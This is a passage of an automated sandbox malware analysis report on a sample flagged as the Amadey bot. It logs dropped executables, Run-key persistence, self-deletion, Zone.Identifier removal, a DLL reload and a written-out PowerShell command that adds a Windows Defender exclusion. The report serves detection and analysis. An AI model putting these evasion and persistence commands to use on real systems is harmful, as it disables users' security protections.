              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DF9C.exe 'C:\Users\user~1\AppData\Local\Temp\DF9C.exe'
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess created: C:\Users\user\AppData\Local\Temp\DF9C.exe DF9C.exe
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess created: C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\AppData\Roaming\irjbuftProcess created: C:\Users\user\AppData\Roaming\irjbuft C:\Users\user\AppData\Roaming\irjbuft
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe 'C:\Users\user~1\AppData\Local\Temp\603c0340b4\sqtvvs.exe'
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeProcess created: C:\Users\user\Desktop\25Kf6vSBoq.exe 'C:\Users\user\Desktop\25Kf6vSBoq.exe'
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6EC5.exe C:\Users\user~1\AppData\Local\Temp\6EC5.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B82B.exe C:\Users\user~1\AppData\Local\Temp\B82B.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C1B2.exe C:\Users\user~1\AppData\Local\Temp\C1B2.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CD0D.exe C:\Users\user~1\AppData\Local\Temp\CD0D.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DF9C.exe C:\Users\user~1\AppData\Local\Temp\DF9C.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EA8A.exe C:\Users\user~1\AppData\Local\Temp\EA8A.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F4BC.exe C:\Users\user~1\AppData\Local\Temp\F4BC.exe
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeProcess created: C:\Users\user\AppData\Local\Temp\6EC5.exe C:\Users\user~1\AppData\Local\Temp\6EC5.exe
              Source: C:\Users\user\AppData\Roaming\irjbuftProcess created: C:\Users\user\AppData\Roaming\irjbuft C:\Users\user\AppData\Roaming\irjbuft
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess created: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess created: C:\Users\user\AppData\Local\Temp\DF9C.exe DF9C.exe
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess created: C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /SpecialRun 4101d8 6864
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe 'C:\Users\user~1\AppData\Local\Temp\603c0340b4\sqtvvs.exe'
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeCode function: 27_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
              Source: C:\Windows\explorer.exeFile created: C:\Users\user~1\AppData\Local\Temp\6EC5.tmpJump to behavior
              Source: EA8A.exe, 00000018.00000000.417957368.0000000000FA2000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
              Source: EA8A.exe, 00000018.00000000.417957368.0000000000FA2000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeCode function: 27_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCommand line argument: \H
              Source: DF9C.exe.4.dr, ??????????????/_?????xptkvqfesn.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
              Source: 25Kf6vSBoq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: 25Kf6vSBoq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: 25Kf6vSBoq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: 25Kf6vSBoq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: 25Kf6vSBoq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: 25Kf6vSBoq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: 25Kf6vSBoq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\vojos\fuw.pdb source: CD0D.exe, 00000016.00000000.407750577.0000000000417000.00000002.00020000.sdmp
              Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: DF9C.exe
              Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 0000001B.00000000.419935360.000000000040C000.00000002.00020000.sdmp
              Source: Binary string: C:\ciwomo siju28 nijohon\93-loze\2.pdb source: F4BC.exe
              Source: Binary string: C:\wucalehozojoh\setujupiwe-y.pdb source: 25Kf6vSBoq.exe, 00000001.00000000.243151680.0000000000401000.00000020.00020000.sdmp, 25Kf6vSBoq.exe, 00000002.00000000.254410960.0000000000401000.00000020.00020000.sdmp, 6EC5.exe, 0000000D.00000000.348402437.0000000000401000.00000020.00020000.sdmp, irjbuft, 0000000E.00000000.347743203.0000000000401000.00000020.00020000.sdmp, 6EC5.exe, 0000000F.00000000.367434923.0000000000401000.00000020.00020000.sdmp, irjbuft, 00000010.00000000.374293727.0000000000401000.00000020.00020000.sdmp
              Source: Binary string: wntdll.pdbUGP source: CD0D.exe, 00000016.00000002.449035922.000000006A8F1000.00000020.00020000.sdmp
              Source: Binary string: wntdll.pdb source: CD0D.exe
              Source: Binary string: `C:\ciwomo siju28 nijohon\93-loze\2.pdb` source: F4BC.exe, 0000001C.00000000.424216485.0000000000401000.00000020.00020000.sdmp

              Data Obfuscation:

              barindex
              Detected unpacking (changes PE section rights)Show sources
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeUnpacked PE file: 22.2.CD0D.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cipizi:R;.rsrc:R; vs .text:EW;
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeUnpacked PE file: 28.2.F4BC.exe.400000.0.unpack .text:ER;.data:W;.daya:W;.rsrc:R;.reloc:R; vs .text:EW;
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 1_2_02E70DD5 push ds; ret
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeCode function: 21_2_00EAD37C push esi; iretd
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_00402E54 push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_00402E63 push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_00402665 push cs; ret
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_0040290C push eax; iretd
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_00402E16 push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_00402DC0 push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_00402DD8 push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_00402DE8 push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_00402DF1 push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_00402E82 push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_00402E85 push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_00402D92 push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_00402E95 push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_00401D9A pushad ; ret
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_00402E9C push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A96D0D1 push ecx; ret
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeCode function: 27_2_0040B550 push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeCode function: 27_2_0040B550 push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeCode function: 27_2_0040B50D push ecx; ret
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00401A61 push ds; retf
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00401569 push edx; iretd
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00401569 push edx; iretd
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00402874 push esp; iretd
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00401575 push edx; iretd
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00402F19 push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_004015D3 push edx; iretd
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_004026D8 push ds; retf
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00401580 push edx; iretd
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_00401981 push ebx; retf
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 1_2_00427060 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
              Source: B82B.exe.4.drStatic PE information: 0x8B87D1F5 [Mon Mar 7 03:28:53 2044 UTC]
              Source: 25Kf6vSBoq.exeStatic PE information: section name: .lufulac
              Source: F4BC.exe.4.drStatic PE information: section name: .daya
              Source: CD0D.exe.4.drStatic PE information: section name: .cipizi
              Source: 3D1.exe.4.drStatic PE information: section name: .vito
              Source: 9C1A.exe.4.drStatic PE information: section name: .yuso
              Source: 6EC5.exe.4.drStatic PE information: section name: .lufulac
              Source: ffjbuft.4.drStatic PE information: section name: .daya
              Source: irjbuft.4.drStatic PE information: section name: .lufulac
              Source: fijbuft.4.drStatic PE information: section name: .cipizi
              Source: B82B.exe.4.drStatic PE information: real checksum: 0x8ddc4 should be: 0x7fd66
              Source: DF9C.exe.4.drStatic PE information: real checksum: 0x0 should be: 0xdd7bb
              Source: EA8A.exe.4.drStatic PE information: real checksum: 0x2bdee should be: 0x3529c
              Source: initial sampleStatic PE information: section name: .text entropy: 6.99265157433
              Source: initial sampleStatic PE information: section name: .text entropy: 6.98189062284
              Source: initial sampleStatic PE information: section name: .text entropy: 7.38549549306
              Source: initial sampleStatic PE information: section name: .text entropy: 7.67294154985
              Source: initial sampleStatic PE information: section name: .text entropy: 7.85713092672
              Source: initial sampleStatic PE information: section name: .text entropy: 7.87137605191
              Source: initial sampleStatic PE information: section name: .text entropy: 7.83451647118
              Source: initial sampleStatic PE information: section name: .text entropy: 6.99265157433
              Source: initial sampleStatic PE information: section name: .text entropy: 6.98189062284
              Source: initial sampleStatic PE information: section name: .text entropy: 6.99265157433
              Source: initial sampleStatic PE information: section name: .text entropy: 7.38549549306

              Persistence and Installation Behavior:

              barindex
              Yara detected Amadey botShow sources
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ffjbuftJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\irjbuftJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fijbuftJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeFile created: C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3D1.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9C1A.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B82B.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F4BC.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C1B2.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\DF9C.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fijbuftJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\CD0D.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ffjbuftJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\EA8A.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeFile created: C:\Users\user\AppData\Local\Temp\1105.tmpJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\irjbuftJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeFile created: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6EC5.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeCode function: 27_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,

              Hooking and other Techniques for Hiding and Protection:

              barindex
              DLL reload attack detectedShow sources
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\1105.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
              Deletes itself after installationShow sources
              Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\25kf6vsboq.exeJump to behavior
              Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
              Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\irjbuft:Zone.Identifier read attributes | delete
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeCode function: 27_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
              Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
